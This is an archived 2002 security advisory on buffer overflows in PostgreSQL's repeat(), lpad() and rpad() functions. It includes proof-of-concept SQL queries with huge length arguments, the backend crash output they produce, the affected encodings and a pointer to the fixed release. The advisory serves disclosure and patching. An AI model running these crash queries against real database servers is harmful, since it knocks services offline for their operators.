21th Aug 2002 [SBWID-5647]
COMMAND
PostgreSQL remote and local buffer overflows
SYSTEMS AFFECTED
all versions
PROBLEM
In Sir Mordred The Traitor, Mordred Labs advisory [0x0003] and [0x0004]
:
Bug 1
=====
Upon invoking a repeat() function, a
src/backend/utils/adt/oracle_compat.c::repeat() function
will gets called which suffers from a buffer overflow.
--[ How to reproduce:
psql> select repeat('xxx',1431655765);
pqReadData() -- backend closed the channel unexpectedly.
This probably means the backend terminated abnormally
before or while processing the request.
The connection to the server was lost. Attempting reset: Failed.
Bug 2
=====
There are two buffer overflows in
src/backend/utils/adt/oracle_compat.c.
1) lpad(text, integer, text) function
2) rpad(text, integer, text) function
--[ Details:
The code for this functions is
src/backend/utils/adt/oracle_compat.c::lpad() and
src/backend/utils/adt/oracle_compat.c::rpad() respectively.
The code suffers from a buffer overflow (of course).
--[ How to reproduce:
shell> pgsql template1 postgres
template1=# select version();
version
-----------------------------------------------------------
PostgreSQL 7.2 on i686-pc-linux-gnu, compiled by GCC 2.96
(1 row)
template1=# create database my_db with encoding='UNICODE';
CREATE DATABASE
template1# c my_db
You are now connected to database my_db.
my_db=# select lpad('xxxxx',1431655765,'yyyyyyyyyyyyyyyy');
pqReadData() -- backend closed the channel unexpectedly.
This probably means the backend terminated abnormally
before or while processing the request.
The connection to the server was lost. Attempting reset: Failed.
!#
The same for rpad() function.
The vulnerable encodings are: EUC_JP, EUC_CN, EUC_KR, EUC_TW, UNICODE,
MULE_INTERNAL.
SOLUTION
Update (26 August 2002)
======
ftp://ftp.postgresql.org/pub/sources/v7.2.2
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH
